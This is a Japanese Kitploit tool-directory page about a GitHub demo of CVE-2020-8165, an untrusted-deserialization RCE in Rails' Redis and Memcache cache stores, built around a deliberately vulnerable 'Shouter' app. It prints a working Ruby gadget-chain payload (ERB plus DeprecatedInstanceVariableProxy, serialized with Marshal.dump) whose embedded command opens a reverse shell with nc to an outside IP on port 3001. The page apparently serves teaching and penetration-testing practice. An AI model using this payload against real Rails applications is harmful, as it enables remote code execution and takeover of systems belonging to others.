Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2020-8165-demo | Kitploit
ツール/GitHubGitHub/danielklim/cve-2020-8165-demo
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubdanielklim/cve-2020-8165-demo

cve-2020-8165-demo

リポジトリを見る
115年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-8165 デモ

CVE-2020-8165 のもう一つのデモですが、大半のものより現実的な実装になっています。

背景

CVE-2020-8165

信頼されていないデータのデシリアライゼーションの脆弱性が rails < 5.2.4.3、rails < 6.0.3.1 に存在し、攻撃者が MemCacheStore および RedisCacheStore 内のユーザー指定オブジェクトをアンマーシャルできる可能性があり、結果として RCE につながる可能性があります。

参考文献

  • https://hackerone.com/reports/413388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
  • https://nvd.nist.gov/vuln/detail/CVE-2020-8165
  • https://www.cvebase.com/cve/2020/8165
  • https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a/

実装

「Shouter」アプリには、Shout モデルにキャッシュ機能があり、shout:string とともに送信されるオプションの画像が DB ではなく redis にキャッシュされ、そこから取得されます。Rails.cache.fetch メソッドは脆弱性の影響を受けるため、このアプリは CVE-2020-8165 の影響を受けやすく、RCE の結果はダッシュボードルートの img タグの src に配置されます。

RCE ペイロードの生成

次のスニペットは、exploit.py を使用して送信する必要があるペイロードを生成します。エクスプロイトを完全に Python で実装するには、シリアライゼーションのステップに若干のニュアンスがあり、解明する必要があります。したがって、現時点では正確なペイロードを生成するために Ruby の Marshal.dump が必要です。

root@kitploit:~
cmd = "Thread.new{system('nc 172.17.188.169 3001 -e /bin/bash')}"
erb = ERB.allocate
erb.instance_variable_set(:@src, cmd)
erb.instance_variable_set(:@lineno, 0)
payload_raw = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
payload = Marshal.dump(payload_raw)
p payload
ツールをダウンロード